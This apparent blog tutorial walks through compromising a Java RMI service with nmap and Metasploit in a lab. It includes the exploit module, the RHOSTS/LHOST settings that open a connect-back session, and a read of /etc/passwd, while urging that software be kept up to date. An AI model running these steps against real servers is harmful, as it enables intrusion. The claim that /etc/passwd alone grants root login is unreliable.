Hacking web servers – Java (Easy Hacking)

Java is rarely updating on web servers and so more often than not when you see it on a web server it will be way out of date. This makes it easy for attackers to get in. Here we find a server running Java RMI on port 1099 and show how we can then fully compromise the server in under 3 minutes, and access the password file.

We touch on this time and again just how important it is to stay up to date with application and OS versions. This again shows that if you are not updating just one component on your web server it is at risk of being compromised very quickly.

In this tutorial we are using just nmap and metasploit framework which are built into Kali linux which we use for most of our tutorials. Download is here; https://www.kali.org/downloads/

First we scan the web server which has an IP address of 192.168.56.103 with nmap to identify open ports and the services running on those ports using the following cmd.

nmap -sV 192.168.56.103

We can see Java RMI running on port 1099

Next we head over to the metasploit framework to search for any built in exploits we may be able to use.

search type:exploit platform:java rmi

The cmd above is pretty self explanatory, we are performing a search with a type of “exploit” for the platform “java” and addition item “rmi”. We recieve the following output;

See the highlighted module we will use

To load this module we use the “use” cmd

use exploit/multi/misc/java_rmi_server

It informs us it has already selected a payload so next we list the “info” page

info

Then once we are happy we know what we need to configure we load the options

show options

We can see in the options what is required and what is not by reading the “required” column.

Everything is set for us except the RHOSTS and LHOST settings which we need to ensure have the correct IP address.

  1. RHOSTS – This is the Remote hosts or the victim machines. We need to set the correct IP address so the exploit knows which machine(s) to target.
  2. LHOST – This is the listening host. This is your machines IP address so the exploit knows which machine to connect back to with the remote session spawned by the exploit.

We do this by using the “set” cmd

set RHOSTS 192.168.56.103

set LHOST 192.168.56.106

Now we have everything configured we just give the “run” cmd which starts the exploit against the victim, and you can see from the video just how quick it is.

All we do now in the demo video is run the “sysinfo” cmd to show we are on the victim server, and then we access the password file by using;

cat /etc/passwd

“cat” outputs the file contents to the console, and “/etc/passwd” is the path and file name of the password file. With this we can login as admin/root and do whatever we want. All because no one updated Java!